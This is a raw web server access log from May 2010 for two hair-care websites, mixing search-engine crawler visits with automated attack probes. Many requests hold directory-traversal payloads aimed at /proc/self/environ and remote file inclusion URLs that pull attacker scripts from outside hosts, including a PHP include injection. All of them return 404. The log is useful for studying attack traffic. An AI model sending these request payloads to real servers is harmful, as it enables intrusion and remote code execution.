204.236.211.159 - - [24/May/2010:14:33:28 -0700] "GET /logs/access.log HTTP/1.1" 200 432511 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:35:06 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:35:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:35:07 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:14:37:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5530 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
79.116.99.34 - - [24/May/2010:14:38:26 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:38:27 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.116.99.34 - - [24/May/2010:14:38:27 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.120.171.42 - - [24/May/2010:14:39:45 -0700] "GET /logs//index.php/connect.lib.php?g4[path]=http://www.weland.nl/cache/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.freehairsecrets.com"
64.120.171.42 - - [24/May/2010:14:39:45 -0700] "GET /index.php/connect.lib.php?g4[path]=http://www.weland.nl/cache/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:14:40:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13741 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
92.241.190.214 - - [24/May/2010:14:42:41 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wingsandaleoflexington.com/images/logo.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
92.241.190.214 - - [24/May/2010:14:42:41 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wingsandaleoflexington.com/images/logo.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
92.241.190.214 - - [24/May/2010:14:42:41 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wingsandaleoflexington.com/images/logo.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
92.241.190.214 - - [24/May/2010:14:45:16 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wingsandaleoflexington.com/images/logo.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.241.190.214 - - [24/May/2010:14:45:16 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wingsandaleoflexington.com/images/logo.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.241.190.214 - - [24/May/2010:14:45:16 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wingsandaleoflexington.com/images/logo.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:14:48:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14287 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:14:48:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8198 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:14:54:42 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:14:54:42 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:14:56:21 -0700] "GET /include.php?language=0&lang_settings=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:14:56:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13223 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.55.224.242 - - [24/May/2010:14:58:16 -0700] "GET /logs/access_100125.log/include.php?language=0&lang_settings=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:14:58:17 -0700] "GET /include.php?language=0&lang_settings=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:14:58:17 -0700] "GET /logs/include.php?language=0&lang_settings=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:14:59:04 -0700] "GET /logs/access_091116.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:15:04:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14379 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:15:09:36 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:15:13:16 -0700] "GET /logs/access_100405.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:15:20:03 -0700] "GET /logs/access_100208.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:15:21:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14575 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.189.224.16 - - [24/May/2010:15:27:55 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:15:27:55 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:15:30:53 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
82.151.74.124 - - [24/May/2010:15:33:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
213.79.93.188 - - [24/May/2010:15:33:53 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
60.190.223.54 - - [24/May/2010:15:33:55 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
211.161.159.74 - - [24/May/2010:15:34:01 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
91.214.228.202 - - [24/May/2010:15:34:18 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
213.149.222.230 - - [24/May/2010:15:34:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
68.6.128.146 - - [24/May/2010:15:34:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
219.4.224.120 - - [24/May/2010:15:34:43 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
218.106.132.3 - - [24/May/2010:15:34:49 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
218.204.29.110 - - [24/May/2010:15:34:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
205.213.195.70 - - [24/May/2010:15:35:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
205.213.195.70 - - [24/May/2010:15:35:03 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:15:35:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7596 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
216.104.15.138 - - [24/May/2010:15:35:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:15:35:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14371 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.111.220 - - [24/May/2010:15:39:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.111.220 - - [24/May/2010:15:39:06 -0700] "GET /logs/ HTTP/1.0" 200 5498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:15:40:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:15:43:44 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:15:48:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3173 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:15:48:47 -0700] "GET /logs/access.log HTTP/1.1" 200 444638 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:15:50:34 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:15:50:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:15:50:34 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:15:53:32 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.10.96 - - [24/May/2010:15:53:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.10.96 - - [24/May/2010:15:53:33 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [24/May/2010:15:56:00 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:15:56:00 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:15:56:00 -0700] "GET /logs/access_091207.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:15:56:11 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:15:56:11 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:15:56:11 -0700] "GET /logs/access_091207.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:15:57:13 -0700] "GET /logs/access_100315.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:15:58:47 -0700] "GET /logs/access_100315.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.80.193.34 - - [24/May/2010:16:00:21 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; SpamBlockerUtility 4.7.1; .NET CLR 2.0.50727)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:16:07:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13269 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:16:08:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4890 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.195.111.220 - - [24/May/2010:16:11:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15103 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:11:54 -0700] "GET /logs/access_100208.log%20%20//export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:11:54 -0700] "GET /logs/access_100208.log%20%20//export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:11:54 -0700] "GET /export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:11:54 -0700] "GET /export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:11:54 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:11:54 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:12:35 -0700] "GET /logs/access_100125.log%20%20//export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [24/May/2010:16:12:36 -0700] "GET /logs/access_100125.log%20%20//export.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:16:14:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:16:15:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18921 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:16:19 -0700] "GET /admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:16:19 -0700] "GET /logs//admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:16:19 -0700] "GET /logs/access.log//admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:16:29 -0700] "GET /admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:16:29 -0700] "GET /logs//admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:16:30 -0700] "GET /logs/access.log//admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:16:17:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4912 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:16:18:17 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:16:19:01 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:16:23:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15167 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
38.105.71.26 - - [24/May/2010:16:25:03 -0700] "GET /logs/access.log HTTP/1.0" 200 452948 "http://www.google.com/search?hl=en&source=hp&q=www.freehairsecrets.com/logs/access.log&aq=f&oq=&aqi=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:25:39 -0700] "GET /admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:25:39 -0700] "GET /logs//admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.201.194 - - [24/May/2010:16:25:39 -0700] "GET /logs/access.log%20%20//admin.lib.inc.php?site_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:16:26:09 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
208.80.193.29 - - [24/May/2010:16:31:58 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt; (R1 1.5))" "freehairsecrets.com"
77.88.25.28 - - [24/May/2010:16:32:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14041 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:16:40:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=906 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:16:40:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3130 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:16:49:07 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:16:49:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15083 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.249.65.115 - - [24/May/2010:16:54:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
74.55.224.242 - - [24/May/2010:16:56:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:16:58:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:16:58:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=921 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:16:59:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14036 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.55.224.242 - - [24/May/2010:16:59:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
91.121.10.96 - - [24/May/2010:17:00:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
95.108.150.235 - - [24/May/2010:17:03:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [24/May/2010:17:03:21 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [24/May/2010:17:03:22 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [24/May/2010:17:03:23 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [24/May/2010:17:03:24 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [24/May/2010:17:03:25 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
213.189.224.16 - - [24/May/2010:17:05:13 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:17:05:13 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:17:06:42 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:17:06:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:17:06:42 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
